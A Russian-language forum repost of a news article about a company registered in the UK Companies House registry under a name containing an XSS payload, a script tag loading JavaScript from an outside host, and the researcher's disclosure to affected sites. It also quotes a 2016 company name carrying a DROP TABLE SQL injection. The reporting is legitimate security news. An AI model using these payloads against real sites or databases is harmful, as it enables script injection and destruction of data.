[Информационная безопасность, JavaScript, HTML] В британском реестре компаний обнаружили XSS
Автор
Сообщение
news_bot ®
Стаж: 6 лет 9 месяцев
Сообщений: 27286
Выпуск комикса XKCD 327 «Мамины эксплойты» в переводе xkcd.ru
20 октября некто Джим Уокер поделился на форуме разработчиков британского государственного реестра компаний Companies House интересным наблюдением. Companies House допускает в именах компаний символы < и >. Это открывает простор для атак на тех сайтах, которые не фильтруют и не экранируют управляющие символы корректным образом. Если сайт отображает название компании и не санитизирует данные, то он потенциально уязвим к XSS-атаке.
Уокер обнаружил, что 16 октября некий Майк Джон Тэнди зарегистрировал компанию с названием "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD. Если XSS-фильтра нет, то такое имя компании внедряет на веб-страницу код, который вызывает внешний JavaScript.
На данный момент из сообщения Джима Уокера название компании удалено, но остались скриншоты.
22 октября регулятор разослал своим партнёрам предупреждение о «компании 12956509». Письмо аккуратно избегает упоминаний настоящего имени. Компанию называют по номеру в базе данных.
В письме сотрудники дают краткий ликбез о природе XSS-атак и предупреждают о возможных рисках безопасности.
Companies House по максимуму скрыла имя компании. Как заметили в Twitter, даже выписка об учреждении 12956509 в поле имени содержала: «Имя компании предоставляется по запросу».
Сам виновник события объявился в треде Джима Уокера 23 октября, через трое суток после находки. Майкл Тэнди объяснил, что раскрывать информацию на публичном форуме с его стороны было бы безответственно, поэтому с Companies House он связался через тикет техподдержки.
Уязвимы ресурсы, которые получают информацию из реестра Compаnies House. Майкл рассказал, что он уже связывается со всеми сайтами, которые вызвали его скрипт. Как посетовал исследователь безопасности, уязвимые к XSS сайты редко размещают контакты для связи и не имеют аккаунт на сервисах по типу HackerOne.
На форуме сотрудники Company House подтвердили, что получили сообщения Тэнди. Имя «компании 12956509» сменилось на THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (буквально «та компания, у которой в имени были тэги HTML»). Неизвестно, исправлена ли уязвимость в системах Company House. Возможно, реестр ввёл специальные ограничения на имена.
В реестре Companies House попытки инъекций кода находят уже не впервые. В 2016 году под номером 10542519 появилась компания с SQL-инъекцией ; DROP TABLE "COMPANIES";-- LTD.
===========
Источник:
habr.com
===========
Похожие новости:
- [Информационная безопасность, Платежные системы, Антивирусная защита, Дизайн мобильных приложений, Монетизация мобильных приложений] Как украсть со счета деньги, которых у вас не было?
- [Информационная безопасность, Open source, Системное администрирование, IT-инфраструктура] Доступна версия Zabbix 5.2
- [Информационная безопасность, Антивирусная защита, Резервное копирование, Конференции] Итоги крупнейшего ИТ-ивента Acronis по киберзащите — #AcronisCyberSummit 2020
- [Информационная безопасность, Системное администрирование, IT-инфраструктура, DevOps] Обеспечиваем безопасность в гибкой разработке и CI/CD (перевод)
- [Информационная безопасность, CTF] Очная ставка NeoQUEST-2020: шифруем 3D-очками, обманываем нейронки и смеемся до слез
- [Разработка веб-сайтов, JavaScript, Проектирование и рефакторинг, Системы сборки] Как привести проект в чувство
- [Информационная безопасность, Поисковые технологии] 51.143.124.155
- [Информационная безопасность, Мессенджеры, Исследования и прогнозы в IT] Исследование: превью ссылок в мессенджерах выдает личные данные и угрожает безопасности
- [Информационная безопасность, Go, GitHub] GitHub: библиотека для сбора SSL-сертификатов
- [Информационная безопасность, Habr, Accessibility, Гаджеты, DIY или Сделай сам] Xакерский мерч | Мантия невидимка
Теги для поиска: #_informatsionnaja_bezopasnost (Информационная безопасность), #_javascript, #_html, #_xss, #_companies_house, #_html, #_informatsionnaja_bezopasnost (
Информационная безопасность
), #_javascript, #_html
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 15:38
Часовой пояс: UTC + 5
Автор | Сообщение |
---|---|
news_bot ®
Стаж: 6 лет 9 месяцев |
|
Выпуск комикса XKCD 327 «Мамины эксплойты» в переводе xkcd.ru 20 октября некто Джим Уокер поделился на форуме разработчиков британского государственного реестра компаний Companies House интересным наблюдением. Companies House допускает в именах компаний символы < и >. Это открывает простор для атак на тех сайтах, которые не фильтруют и не экранируют управляющие символы корректным образом. Если сайт отображает название компании и не санитизирует данные, то он потенциально уязвим к XSS-атаке. Уокер обнаружил, что 16 октября некий Майк Джон Тэнди зарегистрировал компанию с названием "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD. Если XSS-фильтра нет, то такое имя компании внедряет на веб-страницу код, который вызывает внешний JavaScript. На данный момент из сообщения Джима Уокера название компании удалено, но остались скриншоты. 22 октября регулятор разослал своим партнёрам предупреждение о «компании 12956509». Письмо аккуратно избегает упоминаний настоящего имени. Компанию называют по номеру в базе данных. В письме сотрудники дают краткий ликбез о природе XSS-атак и предупреждают о возможных рисках безопасности. Companies House по максимуму скрыла имя компании. Как заметили в Twitter, даже выписка об учреждении 12956509 в поле имени содержала: «Имя компании предоставляется по запросу». Сам виновник события объявился в треде Джима Уокера 23 октября, через трое суток после находки. Майкл Тэнди объяснил, что раскрывать информацию на публичном форуме с его стороны было бы безответственно, поэтому с Companies House он связался через тикет техподдержки. Уязвимы ресурсы, которые получают информацию из реестра Compаnies House. Майкл рассказал, что он уже связывается со всеми сайтами, которые вызвали его скрипт. Как посетовал исследователь безопасности, уязвимые к XSS сайты редко размещают контакты для связи и не имеют аккаунт на сервисах по типу HackerOne. На форуме сотрудники Company House подтвердили, что получили сообщения Тэнди. Имя «компании 12956509» сменилось на THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (буквально «та компания, у которой в имени были тэги HTML»). Неизвестно, исправлена ли уязвимость в системах Company House. Возможно, реестр ввёл специальные ограничения на имена. В реестре Companies House попытки инъекций кода находят уже не впервые. В 2016 году под номером 10542519 появилась компания с SQL-инъекцией ; DROP TABLE "COMPANIES";-- LTD. =========== Источник: habr.com =========== Похожие новости:
Информационная безопасность ), #_javascript, #_html |
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 15:38
Часовой пояс: UTC + 5